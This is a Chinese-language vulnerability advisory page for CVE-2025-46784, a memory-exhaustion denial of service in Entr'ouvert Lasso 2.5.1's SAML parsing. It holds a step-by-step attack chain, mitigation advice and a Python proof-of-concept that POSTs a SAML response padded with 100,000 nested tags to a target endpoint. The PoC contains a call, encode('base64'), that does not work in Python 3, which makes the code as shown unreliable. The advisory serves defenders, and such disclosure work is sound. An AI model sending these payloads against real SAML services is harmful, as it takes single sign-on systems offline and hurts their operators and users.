IPBUF安全漏洞报告
English
CVE-2025-46784 CVSS 7.5 高危

CVE-2025-46784: Entr'ouvert Lasso拒绝服务漏洞

披露日期: 2025-11-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-46784
漏洞类型
拒绝服务(内存耗尽)
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Entr'ouvert Lasso 2.5.1

相关标签

拒绝服务内存耗尽SAMLEntr'ouvert LassoCVE-2025-46784TALOS-2025-2195身份认证绕过网络攻击

漏洞概述

CVE-2025-46784是Entr'ouvert Lasso 2.5.1版本中的一个高危拒绝服务漏洞。该漏洞存在于lasso_node_init_from_message_with_format功能中,攻击者可以通过发送特制的畸形SAML响应来触发此漏洞。当Lasso库处理包含恶意构造数据的SAML响应时,会导致内存耗尽(memory depletion),最终造成服务不可用。由于该漏洞可通过网络远程触发,且无需任何认证和用户交互,攻击门槛较低,对使用Lasso进行SAML身份认证的系统构成严重威胁。攻击者可以利用此漏洞使依赖Lasso进行单点登录(SSO)的应用程序瘫痪,影响业务的连续性和可用性。

技术细节

该漏洞的核心问题在于Entr'ouvert Lasso 2.5.1的lasso_node_init_from_message_with_format函数在解析SAML响应时缺乏适当的内存管理。当接收到特制的畸形SAML响应时,该函数会触发内存泄漏或内存耗尽,导致进程内存持续增长。攻击者可以通过以下步骤利用此漏洞:1)构造包含恶意payload的SAML响应消息;2)将特制响应发送到目标系统的SAML端点;3)Lasso库在解析过程中触发内存分配但未能正确释放;4)随着重复请求,内存持续消耗直至系统资源枯竭;5)最终导致服务崩溃或系统无响应。该漏洞属于CWE-400(资源耗尽)类别,CVSS评分7.5分,对可用性造成严重影响。

攻击链分析

STEP 1
步骤1
攻击者识别使用Entr'ouvert Lasso进行SAML身份认证的目标系统
STEP 2
步骤2
攻击者构造包含恶意payload的畸形SAML响应消息
STEP 3
步骤3
攻击者将特制SAML响应发送到目标系统的SAML断言消费服务(ACS)端点
STEP 4
步骤4
Lasso库的lasso_node_init_from_message_with_format函数在解析过程中触发内存分配但未能正确释放
STEP 5
步骤5
通过重复发送畸形请求,攻击者耗尽目标服务器内存资源
STEP 6
步骤6
目标系统因内存耗尽导致服务崩溃或无响应,实现拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # CVE-2025-46784 PoC - Entrouvert Lasso DoS via Malformed SAML Response # This PoC demonstrates memory depletion via malformed SAML response import requests import sys def create_malformed_saml_response(): """Generate a malformed SAML response to trigger memory depletion""" saml_response = '''<?xml version="1.0" encoding="UTF-8"?> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion> <saml:Subject> <saml:NameID>[email protected]</saml:NameID> </saml:Subject> <!-- Malformed elements to trigger memory depletion --> <saml:AttributeStatement> <saml:Attribute Name="malicious_attribute"> <!-- Repeated malicious content --> <saml:AttributeValue>''' + '<x>' * 100000 + '''</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion> </samlp:Response>''' return saml_response def exploit(target_url): """Send malformed SAML response to target""" saml_response = create_malformed_saml_response() headers = { 'Content-Type': 'application/x-www-form-urlencoded', } data = { 'SAMLResponse': saml_response.encode('base64').decode('ascii') } print(f"[*] Sending malformed SAML response to {target_url}") try: response = requests.post(target_url, data=data, headers=headers, timeout=30) print(f"[+] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} https://vulnerable-server/saml/acs") sys.exit(1) target = sys.argv[1] exploit(target)

影响范围

Entr'ouvert Lasso 2.5.1

防御指南

临时缓解措施
在官方修复版本发布之前,建议采取以下临时缓解措施:1)对SAML端点实施严格的输入验证,限制请求大小和复杂度;2)配置Web服务器限制POST请求的最大尺寸;3)部署入侵检测系统监控异常SAML流量;4)对关键业务系统实施负载均衡和自动故障转移;5)定期监控服务器内存使用情况,设置告警阈值;6)考虑临时禁用非必要的SAML认证功能,切换到备用认证方式。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表